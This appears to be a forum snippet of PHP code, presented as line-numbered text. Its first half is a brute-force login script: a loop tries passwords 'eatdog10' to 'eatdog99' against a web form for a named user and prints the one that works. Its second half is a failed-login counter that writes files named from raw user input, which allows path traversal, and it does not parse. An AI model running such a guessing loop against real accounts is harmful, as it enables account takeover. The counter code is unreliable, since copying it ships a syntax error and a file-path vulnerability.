Form loop with password cracking$username = "johnsmith";$pass_base = "eatdog"

1. Form loop with password cracking
2. $username = "johnsmith";
3. $pass_base = "eatdog";
4. $url = "the url the form submits to";
5. $failed = ""; //the response returned by the server when login fails
6.  
7. for ($i=10; $i < 100; $i++)
8. {
9. $password = $pass_base . $i;
10.  
11. $ch = curl_init();
12. curl_setopt($ch,CURLOPT_URL,$url);
13. curl_setopt($ch,CURLOPT_POST,true);
14. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
15.  
16. //set the POST parameters
17.  
18. $data = curl_exec($ch);
19. curl_close($ch);
20.  
21. if ($data != $failed) //analyze the returned data
22. {
23. echo $password; //this is your password
24. break;
25. }
26. }
27.  
28. $count = file_get_contents('/some/writable/dir/'$_POST['username']);
29. if (!$count) {
30. $count = 0;
31. }
32. if ($count > 5) {
33. print "Naughty!"; // or add a CAPTCHA or something
34. exit;
35. }
36. $success = checkLogin($_POST['username'], $_POST['password']);
37. if ($success) {
38. // set cookies, send them away with header('location:blah.php'); exit
39. } else {
40. $count ++;
41. file_put_contents('/some/writable/dir/'$_POST['username'], $count);
42. }